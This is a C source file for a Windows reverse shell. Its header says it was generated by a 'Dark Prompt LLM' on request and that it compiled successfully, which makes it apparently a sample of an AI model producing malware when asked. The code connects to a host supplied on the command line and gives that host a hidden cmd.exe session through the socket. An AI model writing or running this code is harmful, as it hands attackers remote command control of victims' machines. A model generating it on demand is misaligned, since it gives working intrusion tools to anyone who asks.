/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-26 11:21:03
 * Category: ReverseShell
 * Prompt: Generate a Windows reverse shell in C using Winsock
 * Compile Status: SUCCESS
 * Sample: 2
 * ============================================================
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>

int main(int argc, char *argv[]) {
	if (argc != 3) {
		printf("usage: rev_shell_win hostname port\n");
		return -1;
	}

	char *hostname = argv[1];
	int port = atoi(argv[2]);

	struct hostent *host;
	host = gethostbyname(hostname);
	unsigned long host_ip = *(unsigned long*)host->h_addr_list[0];

	WSADATA wsaData;
	SOCKET mySocket;
	STARTUPINFO sinfo;
	PROCESS_INFORMATION pinfo;

	memset(&sinfo, 0, sizeof(sinfo));
	memset(&wsaData, 0, sizeof(wsaData));

	if(WSAStartup(MAKEWORD(2,2), &wsaData)) {
		fprintf(stderr,"Failed to initialize winsock\n");
		return -1;
	}

	mySocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	//struct sockaddr_in sin;
	//sin.sin_family = AF_INET;
	//sin.sin_port = htons(port);
	//sin.sin_addr.s_addr = host_ip;

	struct sockaddr_in sin;
	sin.sin_family = AF_INET;
	sin.sin_port = htons(port);
	sin.sin_addr.S_un.S_addr = host_ip;

	int result = connect(mySocket, (struct sockaddr*)&sin, sizeof(sin));

	if(result == SOCKET_ERROR || result == -1) {
		fprintf(stderr, "Could not connect!\n");
		return -1;
	} 

	memset(&sinfo, 0, sizeof(sinfo));
	
	sinfo.cb = sizeof(sinfo);
	sinfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
	sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)mySocket;
	CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo);

	wait();
	return 0;
}